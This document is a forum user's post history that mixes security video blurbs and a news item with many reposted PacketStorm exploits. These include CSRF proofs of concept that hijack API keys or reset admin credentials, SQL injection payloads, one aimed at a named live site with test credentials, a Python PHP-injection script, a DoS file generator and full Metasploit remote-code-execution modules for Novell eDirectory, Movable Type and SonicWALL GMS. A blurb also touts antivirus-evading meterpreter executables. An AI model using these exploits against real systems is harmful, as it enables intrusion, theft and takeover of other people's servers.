Praetorian503
Everything posted by Praetorian503
-
Description: In this video I will show you how to use mimikatz for post-exploitation. Using Mimikatz you can play with certificates, dump keys and inject your custom DLL into any process. In this demo I will show you how to dump certificates and how to inject kelloworld.dll into notepad.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Advanced Post-Exploitation Using Mimikatz
-
Description: In this video I will show you how to create an msfpayload without the Metasploit framework using the Inmet tool. Using this tool you can avoid almost all AV detection; it is a very easy to use and powerful tool for exploiting a system. Using this tool you can also exploit a system directly, no need to create a backdoor. The ultimate meterpreter executable. https://github.com/SherifEldeeb/inmet

ultimet:

- Is a Windows executable that can function as various meterpreter flavours, in addition to functioning as "msfpayload" to generate exe files that run hidden when executed.
- Supports functioning as the following meterpreter "types": "reverse_tcp", "bind_tcp", "reverse_http", "reverse_https", "metsvc_bind_tcp" and "metsvcreverse_tcp".
- Can create exe files that connect upon execution using pre-configured settings "exactly as msfpayload generated exe"; however, generated exe files still accept command line arguments, and settings can be reset or changed, all supported from within that single exe ... "meterpreter-on-steroids :)".
- The generated exe is a pre-configured ultimet that can be used to create OTHER exe files! So, let's say you created a reverse_tcp exe using the --msfpayload option; you can use THAT exe later to create another bind_metsvc, then use THAT exe to create a reverse_http ... and so on, or simply reset to default... pretty neat! Once ultimet has found its way inside a Windows environment, you won't need msfpayload or msfvenom anymore to create different exe files for different settings; use the same exe for different situations.
- The msfpayload-like functionality works under Linux perfectly fine using "wine >= 1.3.17", no need to leave your beloved *n?x box to create a pre-configured exe.
- Supports many options to load the stage from: resource, encrypted resource, file, encrypted file or over the network "stager-mode" ... it functions as a non-staged payload "inline" when the stage is provided "either through file or the default bundled-resource".
- The offset of the ReflectiveLoader function is calculated at runtime and the bootstrap is patched in memory, so, in plain English, you can use your own self-compiled metsrv.dll as the stage!

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: The Ultimate Meterpreter Executable And Bypass Avs Using Inmet
-
Description: We present FRAK, the firmware reverse analysis konsole. FRAK is a framework for unpacking, analyzing, modifying and repacking the firmware images of proprietary embedded devices. The FRAK framework provides a programmatic environment for the analysis of arbitrary embedded device firmware as well as an interactive environment for the disassembly, manipulation and re-assembly of such binary images. We demonstrate the automated analysis of Cisco IOS, Cisco IP phone and HP LaserJet printer firmware images. We show how FRAK can integrate with existing vulnerability analysis tools to automate bug hunting for embedded devices. We also demonstrate how FRAK can be used to inject experimental host-based defenses into proprietary devices like Cisco routers and HP printers.

Ang Cui is the founder of Red Balloon Security Inc., which specializes in the development of offensive and defensive technologies for embedded systems. Ang is also currently a PhD candidate at Columbia University in the Intrusion Detection Systems Laboratory.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Embedded Device Firmware Vulnerability Hunting Using Frak
-
Description: This talk will focus on detecting reflective injection with some mildly humorous notes and bypassing said protections until vendors start actually working on this problem. It seems amazing that reflective injection still works. Why is that? Because programmers are lazy. They don't want to write new engines, they want to write definitions for an engine that already exists. So what do we do about it? Release a $5 tool that does what $50 AV has failed epically at for several years now... oh, and it took me a week or so... Alternately, you could license it to vendors since their programmers are lazy.

Andrew King is a recent graduate. He has been a hobbyist for many years, but has only recently tried to transition into information security as a job field. A previous talk was given at ToorCon on polymorphism as it relates to definitions. He wrote a set of articles demonstrating implementation of simple internal-to-function encoding and decoding. Additional code will be released to demonstrate automation of binary patching to use this method without using a debugger. It is not a fully functional evasion tool, but it does demonstrate pushing this level of obfuscation into a more automated arena. Adding a couple of small code sections could turn this into a usable evasion tool. Twitter: @aking1012

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Detecting Reflective Injection
-
WordPress SolveMedia version 1.1.0 suffers from a cross site request forgery vulnerability.

```text
# Exploit Title: WordPress SolveMedia 1.1.0 CSRF Vulnerability
# Release Date: 24/01/13
# Author: Junaid Hussain - [ illSecure Research Group ] -
# Contact: illSecResearchGroup@Gmail.com | Website: http://illSecure.com
# Software Link: http://downloads.wordpress.org/plugin/solvemedia.1.1.0.zip
# Vendor Homepage: http://solvemedia.com
# Tested on: CentOs 5
# Google Dork: inurl:wp-content/plugins/solvemedia
```

Introduction: SolveMedia is a captcha service that allows webmasters to monetize from correct captcha type-ins. solvemedia.admin.inc is vulnerable to CSRF: there are no anti-CSRF tokens implemented, nor is the wp-nonce function used, therefore an attacker can change the webmaster's SolveMedia API keys (public key, private key, hash key) to the attacker's own set of API keys, thus stealing the webmaster's SolveMedia revenue.

CSRF - Proof Of Concept:

```html
<html>
<form method="post" action="http://illsecure.com/wp-admin/plugins.php?page=solvemedia/solvemedia.admin.inc&updated=true">
<input name="adcopy_opt_pubkey" id="adcopy_opt_pubkey" size="40" value="[ ATTACKERS PUBLIC KEY ]" style="display:none;"/>
<input name="adcopy_opt_privkey" id="adcopy_opt_privkey" size="40" value="[ ATTACKERS PRIVATE KEY ]" style="display:none;"/>
<input name="adcopy_opt_hashkey" id="adcopy_opt_hashkey" size="40" value="[ ATTACKERS HASH KEY ]" style="display:none;" />
<input type="submit" name="submit" value="Enter" />
</form>
</html>
```

End PoC.

Patch:
- Vendor was notified on 22/01/2013
- Vendor released version 1.1.1 on 23/01/2013 which included a patch
- Patched Version (1.1.1): http://wordpress.org/extend/plugins/solvemedia/
- ChangeLog: http://wordpress.org/extend/plugins/solvemedia/changelog/

Original: http://illSecure.com/code/Wordpress-SolveMedia-CSRF-Vulnerability.txt

Source: PacketStorm
-
SQLiteManager versions 1.2.4 and below suffer from a remote PHP code injection vulnerability.

Description:

```text
===============================================================
Exploit Title: SQLiteManager 0Day Remote PHP Code Injection Vulnerability
Google Dork: intitle:SQLiteManager inurl:sqlite/
Date: 23/01/2013
Exploit Author: RealGame
Vendor Homepage: http://www.Relagame.co.il
Software Link: http://sourceforge.net/projects/sqlitemanager/
Version: <=1.2.4
Tested on: Windows XP, Debian 2.6.32-46
CVE: N/A
===============================================================
Vulnerable Software:
Name: SQLiteManager
Official Site: http://www.sqlitemanager.org/
Name: Ampps
Official Site: http://www.ampps.com/
Name: VertrigoServ
Official Site: http://vertrigo.sourceforge.net/
===============================================================
About Software:
Official Site: http://www.sqlitemanager.org/
SQLiteManager is a database manager for SQLite databases. You can manage any SQLite database created on any platform with SQLiteManager.
===============================================================
Easy Way To Fix:
Find: SQLiteStripSlashes($_POST['dbpath'])
Replace: str_replace('.', '', SQLiteStripSlashes($_POST['dbpath']))
On File: ./include/add_database.php
===============================================================
```

The exploit script as posted (Python 2; the listing is cut off after the second request's parameters are built):

```python
import re
import urllib2
from urllib import urlencode
from sys import argv, exit

def strip_tags(value):
    #Strip tags with RegEx
    return re.sub('<[^>]*?>', '', value)

def getDbId(sqliteUrl, myDbName):
    #Find Components
    htmlRes = urllib2.urlopen(sqliteUrl, None, 120).read()
    if htmlRes:
        #If you found it take all the rows
        td = re.findall('<td class="name_db">(.*?)</td>', htmlRes, re.DOTALL)
        #Make a dict of stripped columns
        for element in td:
            if strip_tags(element) == myDbName:
                #Return Id
                return "".join(re.findall('\?dbsel=(.*?)"', element, re.DOTALL))
    return None

def main():
    print \
        'SQLiteManager Exploit\n' + \
        'Made By RealGame\n' + \
        'http://www.RealGame.co.il\n'
    if len(argv) < 2:
        #replace('\\', '/') - To Do The Same In Win And Linux
        filename = argv[0].replace('\\', '/').split('/')[-1]
        print 'Execute Example: ' + filename + ' http://127.0.0.1/sqlite/\n'
        exit()
    sqliteUrl = argv[1]
    myDbName = "phpinfo"
    myDbFile = "phpinfo.php"
    #Create Database
    params = {'dbname' : myDbName,
              'dbVersion' : '2',
              'dbRealpath' : None,
              'dbpath' : myDbFile,
              'action' : 'saveDb'}
    urllib2.urlopen(sqliteUrl + "main.php", urlencode(params), 120)
    #Get Database ID
    dbId = getDbId(sqliteUrl + "left.php", myDbName)
    #If Database Created
    if dbId:
        #Create Table + Shell Creator
        params = {'DisplayQuery' : 'CREATE TABLE temptab ( codetab text );\n' + \
                                   'INSERT INTO temptab VALUES (\'<?php phpinfo(); unlink(__FILE__); ?>\');\n',
                  'sqlFile' : None,
                  'action' : 'sql',
                  'sqltype' : '1'}
```

Source: PacketStorm
-
iCart Pro version 4.0.1 appears to suffer from a remote SQL injection vulnerability.

```text
# Exploit Title: vbcovor ICART SQLI
# Date: 25/01/2013
# Author(s): n3tw0rk
# Contact: Mail:infectedelite@gmail.com
# Product: iCart Pro
# Software Version 4.0.1
# Product Download: http://www.vbcover.com/icart.php?do=product&productid=61
# Google Dork: inurl:icart.php
# Requires editing product access for SQL error; admin account will work
# Exploit link: icart.php?do=editproduct&productid=[product ID]&section='
```

Live link: https://www.rostyles.com/forum/icart.php?do=editproduct&productid=19&section=' (requires admin access login test:1234)

```text
Database error in vBulletin 4.2.0:

Invalid SQL:
SELECT name, ' FROM covercartproduct WHERE id = '19';

MySQL Error   : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '19'' at line 1
Error Number  : 1064
Request Date  : Friday, January 25th 2013 @ 06:46:30 AM
Error Date    : Friday, January 25th 2013 @ 06:46:31 AM
Script        : http://www.rostyles.com/forum/icart.php?do=editproduct&productid=19&section='
Referrer      :
IP Address    :
Username      : Teascu Dorin
Classname     : vB_Database
MySQL Version : 5.0.96-log
```

Shouts to: Teoz, n0tch, shadow008. http://myupdatezone.com for more 0days and databases

Source: PacketStorm
-
PHP Weby Directory Software version 1.2 suffers from cross site request forgery and remote blind SQL injection vulnerabilities.

```text
===========================================
Vulnerable Software: PHP Weby directory software version 1.2
Vendor: http://phpweby.com
Download: ht*p://phpweby.com/down/phpwebydirectory.zip
Vuln: Blind SQL injection && CSRF
Dork: intext:Powered by PHP weby software
===========================================
```

About Software: Php Weby directory script is a powerful and easy-to-use FREE link management script with numerous options for running a directory, catalog of sites or a simple link exchange system. Create a general directory and have users submit their favorite sites and charge if you want for the review. Or create a regional directory for your town or state and sell advertising, or a niche directory about a topic you love or know. Features include an integrated payment system with PayPal, link validation, SEO urls, unlimited categories and subcategories, reciprocal linking, link editor, template driven system and many more. Check them all here. Php weby free link directory script is licensed under the GNU GPL license. The link to http://phpweby.com can NOT be removed. Contact us at the forums for more information.

```text
===========================================
Tested On: Debian squeeze 6.0.6
Server version: Apache/2.2.16 (Debian)
Apache traffic server 3.2.0
MYSQL: 5.1.66-0+squeeze1
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
    with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
===========================================
```

Here is one vulnerable code example (contact.php, the user-supplied POST fields are concatenated straight into the INSERT statement):

```php
//contact.php
//==============SNIP BEGINS===============
if($capt)
{
    unset($capt);
    if($_POST['fullname']=='' || $_POST['subject']=='' || $_POST['message']=='' || $_POST['mail']=='')
        $smarty->assign('error','Please complete the form!');
    else
    {
        $c=$db->Execute("INSERT INTO contacts(fullname,subject,message,mail,ip,timehour) values('" . $_POST['fullname'] . "','" . $_POST['subject'] . "','" . $_POST['message'] . "','" . $_POST['mail'] . "','" . $_SERVER['REMOTE_ADDR']."','".date('r'). "')");
        if($c===false)
            $smarty->assign('error','Unknown error occured.');
        else
            $smarty->assign('added',1);
//===========SNIP ENDS HERE================
```

Exploitation:

```text
METHOD: $_POST
URL: http://site.tld/contact.php
Headers:
Host: hacker1.own
User-Agent: UiUiUiUiUi Ping And UiUiUiUiUi And Pong:((
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 245

REQ BODY:
fullname=Ping And Pong Is Interesting Game xD%5C&mail=sssssssssssssssssss&subject=,(select case((select mid(`pass`,1,1) from admin_area limit 1 offset 0)) when 0x32 then sleep(10) else 0 end) ,1,2,3,4)-- and 5!=('Advertising+Inquiry&message=TEST
===================EOF===================
```

Here is how it looks (I prefer the time-based way because simply extracting and then inserting the hash into a table is not useful anymore; only the admin can see it from the admin panel).

IMAGE 1: http://s017.radikal.ru/i420/1301/c6/11128cbea352.png
COPY IMAGE: http://oi47.tinypic.com/2ptp79g.jpg

Also, this type of SQL injection (INSERT/UPDATE) is useful to create Denial of Service conditions against the target site/server. If so, simply benchmark() is your best friend.

Second Vulnerability: CSRF. Simple exploit to change admin username/password/email. Login/password will be changed to pwned and email to admin@toattacker.tld:

```html
<body onload="javascript:document.forms[0].submit()">
<form action="http://hacker1.own/phpweb/admin/options.php?r=admin" method="post">
<input type="text" name="ADMIN_NAME" value="admin"/>
<input type="text" name="ADMIN_MAIL" value="admin@toattacker.tld"/>
<input type="text" name="usr" value="pwned"/>
<input type="password" name="pass1" value="pwned"/>
<input type="password" name="pass2" value="pwned"/>
<input type="hidden" name="oldusr" value="admin"/>
<input type="submit" value="Save" class="ss"/>
</form>
```

KUDOSSSSSSS: packetstormsecurity.org, packetstormsecurity.com, packetstormsecurity.net, securityfocus.com, cxsecurity.com, security.nnov.ru, securtiyvulns.com, securitylab.ru, secunia.com, securityhome.eu, exploitsdownload.com, osvdb.com, websecurity.com.ua, 1337day.com, itsecuritysolutions.org; to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3* + To All Turkish Hackers. Also special thanks to: ottoman38 & HERO_AZE

/AkaStep

Source: PacketStorm
-
KMPlayer versions 3.5.0.77 and below suffer from a denial of service vulnerability.

```text
Title : KMPlayer (PlayList M3U) Denial Of Service PoC All Versions
Author : Jigsaw (Abdelmorite Eljoaydi)
Date : 26-01-2013
E-mail : jigsaw0658@gmail.com
Home : Morocco
Facebook page : facebook.com/abdelmorit.alma
platform : software
Impact : Denial Of Service
Tested on : KMPlayer (http://www.kmpmedia.net/) Version 3.2-3.3-3.4 and 3.5.00.77
OS : Tested on Windows XP SP1, SP2 and SP3. 'Windows 7 is not Vulnerable'; other OS maybe Vulnerable
Risk : Low[+] / Medium[-]
```

How to reproduce: After creating a file with the PoC below, open the playlist file in KMPlayer; a box will pop up, just press OK. After that press the play button to trigger the DoS vulnerability. The program will not be able to respond until the process is killed using the task manager.

Proof of concept:

```perl
#!/usr/bin/perl
# Writes an .m3u playlist: the "M3U" marker followed by 90000 'A' bytes
my $j = "\x41" x 90000;
my $h = "\x4D\x33\x55";
my $file = "kmplayer.m3u";
open ($File, ">$file");
print $File $h.$j;
close ($File);
```

Source: PacketStorm
-
Description: One of the most effective techniques used in CTF is the usage of various exploits, written with the help of well-known tools or even manually during the game. Experience in CTF participation shows that a mechanism for detecting such exploits is able to significantly increase the defense level of the team. In this presentation we propose an approach and a hybrid shellcode detection method, aimed at early detection and filtering of unknown 0-day exploits at the network level. The proposed approach allows us to summarize the capabilities of shellcode detection algorithms developed over the last ten years into optimal classifiers. The proposed approach allows us to reduce the total fp rate almost to 0, provides full coverage of the shellcode classes detected by individual classifiers and significantly increases the total throughput of detectors. Evaluation with shellcode datasets, including Metasploit Framework 4.3 plain-text, encrypted and obfuscated shellcodes, benign Win32 and Linux ELF executables, random data and multimedia, shows that the hybrid data-flow classifier significantly boosts analysis throughput for benign data - up to 45 times faster than a linear combination of classifiers, and almost 1.5 times faster for shellcode-only datasets.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Demorpheus: Getting Rid Of Polymorphic Shellcodes In Your Network
-
Target Link

Task:
- Version;
- Database;
- User;
- Hostname;
- Nickname.

Rules:
- Post a screenshot;
- Use union based;
- Send me a PM with your syntax.

Proof:

Solvers:
- UnderKode
- StoNe-
- Boogy
- alexx666xx [PM]
- afumat
- daNNy.bv
- express_
- phynx (PM)
- EterNo

CLOSED
-
Description: You know you can't stay away! The most talked about panel at DEF CON! Nearly two hours of non-stop FAIL. Come hear some of the loudest mouths in the industry talk about the epic security failures of the last year. So much fail, you'll need the food cooked on stage to survive. Nothing is sacred, not even each other. This year's fail includes cloud, mobile and apt, to name just a few topics. If that's not enough, we'll also be making crepes on stage. Over the last two years, we've raised over $1,500 for the EFF; let's see how much we can do this year....

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Def Con Comedy Jam V, V For Vendetta
-
Description: ANTHONY "DARKFLOYD" LAI, SECURITY RESEARCHER, VALKYRIE-X SECURITY RESEARCH GROUP (VXRL); TONY "MT" MIU, RESEARCHER, VXRL; KELVIN "CAPTAIN" WONG, RESEARCHER, VXRL; ALAN "AVENIR" CHUNG, RESEARCHER, VXRL

Enterprises currently dump millions of bucks to defend against DDoS; some trading firms here are paying, for fear of the DDoS attack from China, about 5K to 100K USD per day, and InfoSec teams believe their solutions are perfect already. Are those controls effective and unbreakable? In the first part of the presentation, we would like to show our studies and carry out over 10 types of DDoS test against various big firms and organizations to see whether their defense is effective, showing how stupid and smart they are. Various interesting case studies will be briefed.

In the second part of the presentation, we will detail our proposed defense model against Application-Level attacks. We have already checked with other vendors and researchers about our model; it is still not yet deployed and hopefully we could put this as an open source project in the future. Hopefully, you will enjoy this fun session with us and learn whether your organization could survive even under DDoS attack.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: http://www.securitytube.net/video/6757
-
Coailii 1.0 [Process Manager / Anti Desktop Locker]
Praetorian503 replied to Maximus's topic in Programe hacking

Note that the exit button doesn't work! You probably put:

Process.Start("www.rstforums.com")

and forgot:

Me.Close()

It should have been:

Process.Start("www.rstforums.com")
Me.Close()

Anyway, nice and useful. PS: Nice name. Maybe COAILII v2.0 will show up too :))
-
Security firm Trend Micro has predicted the number of threats targeting the Android mobile operating system will pass the one million mark by the end of 2013. The increase would represent a near tripling of the number of threats currently known to be targeting Android. Trend Micro reported that at the end of 2012 it had detected roughly 350,000 threats targeting Google's operating system. The figure means that it has taken Android just three years to boast the same number of threats it took PCs 14 years to reach.

"2012 was a year of real evolution in traditional threat and evolution into new platforms and geographies," said Trend Micro vice president of security research, Rik Ferguson. "The mobile threat has come of age, criminals are already moving their operations into former developing internet economies and have devoted a lot of effort to hardening their point and click attack toolkits to evade detection by security vendors. We must continue to track and anticipate these developments in the security industry."

The report also revealed that Android users are seemingly unconcerned about the threat facing them. Trend Micro reported only one in five current Android devices have a security service installed. Ferguson warned that criminals will likely begin to use Android as a springboard to target other new platforms.

"Android is already the criminals' mobile OS of choice as these reports demonstrate, it is not too much of a stretch to think of criminals looking for ways to exploit other connected devices in the future," said Ferguson. "If there's a financial incentive, whether that is hacking what you can see to influence your behaviour by pushing criminal scams, selling your behavioural and consumption data or stealing your electricity supply, they will do it."

Trend Micro's comments follow on from the discovery of several new Android malware strains. Most recently competitor Symantec released a report claiming the Android.Exprespam spam had managed to infect multiple thousands of devices two weeks after it began operating.

Source: Android threats to top one million by year's end - IT News from V3.co.uk
-
This exploit abuses a buffer overflow vulnerability in Novell eDirectory. The vulnerability exists in the ndsd daemon, specifically in the NCP service, while parsing a specially crafted Keyed Object Login request. It allows remote code execution with root privileges.

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Novell eDirectory 8 Buffer Overflow',
      'Description'    => %q{
        This exploit abuses a buffer overflow vulnerability in Novell eDirectory. The
        vulnerability exists in the ndsd daemon, specifically in the NCP service, while
        parsing a specially crafted Keyed Object Login request. It allows remote code
        execution with root privileges.
      },
      'Author'         =>
        [
          'David Klein', # Vulnerability Discovery
          'Gary Nilson', # Exploit
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2012-0432'],
          [ 'OSVDB', '88718'],
          [ 'BID', '57038' ],
          [ 'EDB', '24205' ],
          [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=3426981' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2013/Jan/97' ]
        ],
      'DisclosureDate' => 'Dec 12 2012',
      'Platform'       => 'linux',
      'Privileged'     => true,
      'Arch'           => ARCH_X86,
      'Payload'        => { },
      'Targets'        =>
        [
          [ 'Novell eDirectory 8.8.7 v20701.33/ SLES 10 SP3',
            {
              'Ret'    => 0x080a4697, # jmp esi from ndsd
              'Offset' => 58
            }
          ]
        ],
      'DefaultTarget'  => 0
    ))

    register_options([Opt::RPORT(524),], self.class)
  end

  def check
    connect
    sock.put(connection_request)
    res = sock.get
    disconnect

    if res.nil? or res[8, 2].unpack("n")[0] != 0x3333 or res[15, 1].unpack("C")[0] != 0
      # res[8,2]  => Reply Type
      # res[15,1] => Connection Status
      return Exploit::CheckCode::Safe
    end

    return Exploit::CheckCode::Detected
  end

  def connection_request
    pkt = "\x44\x6d\x64\x54"  # NCP TCP id
    pkt << "\x00\x00\x00\x17" # request_size
    pkt << "\x00\x00\x00\x01" # version
    pkt << "\x00\x00\x00\x00" # reply buffer size
    pkt << "\x11\x11"         # cmd => create service connection
    pkt << "\x00"             # sequence number
    pkt << "\x00"             # connection number
    pkt << "\x00"             # task number
    pkt << "\x00"             # reserved
    pkt << "\x00"             # request code
    return pkt
  end

  def exploit
    connect

    print_status("Sending Service Connection Request...")
    sock.put(connection_request)
    res = sock.get

    if res.nil? or res[8, 2].unpack("n")[0] != 0x3333 or res[15, 1].unpack("C")[0] != 0
      # res[8,2]  => Reply Type
      # res[15,1] => Connection Status
      fail_with(Exploit::Failure::UnexpectedReply, "Service Connection failed")
    end

    print_good("Service Connection successful")

    pkt = "\x44\x6d\x64\x54"  # NCP TCP id
    pkt << "\x00\x00\x00\x00" # request_size (filled later)
    pkt << "\x00\x00\x00\x01" # version (1)
    pkt << "\x00\x00\x00\x05" # reply buffer size
    pkt << "\x22\x22"         # cmd
    pkt << "\x01"             # sequence number
    pkt << res[11]            # connection number
    pkt << "\x00"             # task number
    pkt << "\x00"             # reserved
    pkt << "\x17"             # Login Object FunctionCode (23)
    pkt << "\x00\xa7"         # SubFuncStrucLen
    pkt << "\x18"             # SubFunctionCode
    pkt << "\x90\x90"         # object type
    pkt << "\x50"             # ClientNameLen
    pkt << rand_text(7)
    jmp_payload = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+#{target['Offset'] + 4}").encode_string
    pkt << jmp_payload # first byte is the memcpy length, must be bigger than 62 to overwrite EIP
    pkt << rand_text(target['Offset'] - jmp_payload.length)
    pkt << [target.ret].pack("V")
    pkt << payload.encoded

    pkt[4,4] = [pkt.length].pack("N")

    print_status("Sending Overflow on Keyed Object Login...")
    sock.put(pkt)
    sock.get

    disconnect
  end

end
```

Source: PacketStorm
-
This Metasploit module can be used to execute a payload on MoveableType (MT) that exposes a CGI script, mt-upgrade.cgi (usually at /mt/mt-upgrade.cgi), that is used during installation and updating of the platform. This allows for code injection.

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote

  include Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution',
      'Description'    => %q{
        This module can be used to execute a payload on MoveableType (MT) that exposes a CGI
        script, mt-upgrade.cgi (usually at /mt/mt-upgrade.cgi), that is used during
        installation and updating of the platform.

        The vulnerability arises due to the following properties:

        1. This script may be invoked remotely without requiring authentication to any MT
        instance.

        2. Through a crafted POST request, it is possible to invoke particular database
        migration functions (i.e functions that bring the existing database up-to-date with
        an updated codebase) by name and with particular parameters.

        3. A particular migration function, core_drop_meta_for_table, allows a class
        parameter to be set which is used directly in a perl eval statement, allowing perl
        code injection.
      },
      'Author'         =>
        [
          'Kacper Nowak',
          'Nick Blundell',
          'Gary O\'Leary-Steele'
        ],
      'References'     =>
        [
          ['CVE', '2012-6315'], # superseded by CVE-2013-0209 (duplicate)
          ['CVE', '2013-0209'],
          ['URL', 'http://www.sec-1.com/blog/?p=402'],
          ['URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html']
        ],
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Compat' =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'Platform'       => [ 'win', 'unix' ],
      'Targets'        =>
        [
          ['Movable Type 4.2x, 4.3x', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jan 07 2013",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI path of the Movable Type installation', '/mt'])
      ], self.class)
  end

  def check
    @peer = "#{rhost}:#{rport}"
    fingerprint = rand_text_alpha(5)
    print_status("#{@peer} - Sending check...")
    begin
      res = http_send_raw(fingerprint)
    rescue Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end

    if (res)
      if (res.code == 200 and res.body =~ /Can't locate object method \\"dbi_driver\\" via package \\"#{fingerprint}\\" at/)
        return Exploit::CheckCode::Vulnerable
      elsif (res.code != 200)
        return Exploit::CheckCode::Unknown
      else
        return Exploit::CheckCode::Safe
      end
    else
      return Exploit::CheckCode::Unknown
    end
  end

  def exploit
    @peer = "#{rhost}:#{rport}"
    print_status("#{@peer} - Sending payload...")
    http_send_cmd(payload.encoded)
  end

  def http_send_raw(cmd)
    path = normalize_uri(target_uri.path) + '/mt-upgrade.cgi'
    pay = cmd.gsub('\\', '\\\\').gsub('"', '\"')
    send_request_cgi(
      {
        'uri'       => path,
        'method'    => 'POST',
        'vars_post' =>
          {
            '__mode'     => 'run_actions',
            'installing' => '1',
            'steps'      => %{[["core_drop_meta_for_table","class","#{pay}"]]}
          }
      })
  end

  def http_send_cmd(cmd)
    pay = 'v0;use MIME::Base64;system(decode_base64(q('
    pay << Rex::Text.encode_base64(cmd)
    pay << ')));return 0'
    http_send_raw(pay)
  end

end
```

Source: PacketStorm
-
This Metasploit module exploits a code execution flaw in SonicWALL GMS. It exploits two vulnerabilities in order to achieve its objective. An authentication bypass in the Web Administration interface allows abuse of the "appliance" application and upload of an arbitrary payload embedded in a JSP. The module has been tested successfully on SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual Appliance (Linux). On the Virtual Appliance the Linux meterpreter hasn't run successfully while testing, so shell payloads have been used.

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SonicWALL GMS 6 Arbitrary File Upload',
      'Description'    => %q{
          This module exploits a code execution flaw in SonicWALL GMS. It exploits two
        vulnerabilities in order to get its objective. An authentication bypass in the
        Web Administration interface allows to abuse the "appliance" application and
        upload an arbitrary payload embedded in a JSP. The module has been tested
        successfully on SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL
        GMS 6.0.6022 Virtual Appliance (Linux). On the Virtual Appliance the linux
        meterpreter hasn't run successfully while testing, shell payload have been used.
      },
      'Author'         =>
        [
          'Nikolas Sotiriu', # Vulnerability Discovery
          'Julian Vilas <julian.vilas[at]gmail.com>', # Metasploit module
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-1359'],
          [ 'OSVDB', '89347' ],
          [ 'BID', '57445' ],
          [ 'EDB', '24204' ]
        ],
      'Privileged'     => true,
      'Platform'       => [ 'win', 'linux' ],
      'Targets'        =>
        [
          [ 'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'win'
            }
          ],
          [ 'SonicWALL GMS Viewpoint 6.0 Virtual Appliance (Linux)',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'linux'
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 17 2012'))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [true, 'Path to SonicWall GMS', '/'])
      ], self.class)
  end

  def on_new_session
    # on_new_session will force stdapi to load (for Linux meterpreter)
  end

  def generate_jsp
    var_hexpath      = Rex::Text.rand_text_alpha(rand(8)+8)
    var_exepath      = Rex::Text.rand_text_alpha(rand(8)+8)
    var_data         = Rex::Text.rand_text_alpha(rand(8)+8)
    var_inputstream  = Rex::Text.rand_text_alpha(rand(8)+8)
    var_outputstream = Rex::Text.rand_text_alpha(rand(8)+8)
    var_numbytes     = Rex::Text.rand_text_alpha(rand(8)+8)
    var_bytearray    = Rex::Text.rand_text_alpha(rand(8)+8)
    var_bytes        = Rex::Text.rand_text_alpha(rand(8)+8)
    var_counter      = Rex::Text.rand_text_alpha(rand(8)+8)
    var_char1        = Rex::Text.rand_text_alpha(rand(8)+8)
    var_char2        = Rex::Text.rand_text_alpha(rand(8)+8)
